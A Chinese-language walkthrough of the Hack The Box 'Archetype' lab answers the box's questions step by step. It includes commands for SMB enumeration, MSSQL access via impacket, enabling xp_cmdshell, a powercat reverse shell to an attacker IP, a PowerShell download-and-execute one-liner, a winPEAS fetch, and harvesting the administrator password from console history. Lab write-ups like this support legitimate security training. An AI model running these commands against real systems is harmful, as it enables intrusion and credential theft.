HTB-ArcheType

一、哪一个TCP端口托管数据库服务器？

nmap -sV  10.129.186.174
namp -sV -sC 10.129.186.174

二、SMB上可用的非管理共享的名称是什么？

#使用SMBclient查看共享名称列表
#-N:不使用密码
#-L:列出名称
#-I:IP地址
smbclient -N -L -I 10.129.186.174

三、SMB共享上文件中标识的密码是什么？

#-U:指定用户名和密码
smbclient //10.129.186.174/backups -U backups
#下载共享中的文件
get prod.dtsconfig

四、可以使用Impacket集合中的什么脚本来建立与Microsoft SQL Server的经过身份验证的连接？

#经过提示在impacket工具里面，直接在kali工具中寻找
#https://www.kali.org/tools/impacket-scripts/#impacket-mssqlclient
mssqlclient.py

五、可以使用Microsoft SQL Server的哪些扩展存储过程来生成Windows命令shell？

xp_cmdshell

六、可以使用什么脚本来搜索可能路径以提升 Windows 主机上的权限？

#WinPEAS.exe 的目标是在 Windows 环境中搜索可能的权限提升路径，需要目标系统（.Net >= 4.5.2）环境，支持打印输出颜色
#https://github.com/carlospolop/PEASS-ng
winpeas

七、什么文件包含管理员的密码？

#第三题中获取了数据库的用户名和密码，可以用impacket-mssqlclient连接
sudo impacket-mssqlclient [email protected] -windows-auth

#开启xp——cmdshell，使用impactet自带的enable_xp_cmdshell
enable_xp_cmdshell
#使用命令开启
sp_configure 'show advanced options',1
reconfigure
sp_configure 'xp_cmdshell',1
reconfigure
#测试是否开启成功(直接使用xp_cmdshell可能会有问题)
exec master..xp_cmdshell "whoami"

#目标系统为windows server 2008R2，可以尝试制作ps1文件获取shell
#使用powercat或者直接复制网上代码修改IP地址和端口即可
#powercat项目地址
https://github.com/besimorhino/powercat
#管理员打开powershell（注意关闭杀毒软件）
Set-ExecutionPolicy Unrestricted
Import-Module .\powercat.ps1
#生成使用powershell -e可以直接执行的shell
powercat.ps1 -c 10.10.14.28 -p 4444 -ge shell.ps1

#将shell.ps1文件放到目录中，并在此目录下开启python服务
python3 -m http.server 80

#使用cmdshell远程下载shell.ps1，并执行
exec master..xp_cmdshell "powershell -exec bypass -c IEX(New-Object System.Net.WebClient).DownloadString('URI');";

#获取shell

#使用前面提到过的提权工具winpeas,获取一些文件路径和系统漏洞
curl http://10.10.14.28/winPEASx86.exe -O winPEAS.exe
.\winPEAS.exe

#找到consolehost_histroy.txt，找到administrator的密码
type consolehost_history.txt

八、提交user的flag

#切换到C:\users\sql_svc\Desktop
type user.txt

九、提交root的flag

#使用impacket-psexec连接10.129.11.234
impacket-psexec [email protected]

---

十、总结

• impacket工具使用
• powershell后门的制作
• winpeas工具的使用
• consolehost_history.txt文件的作用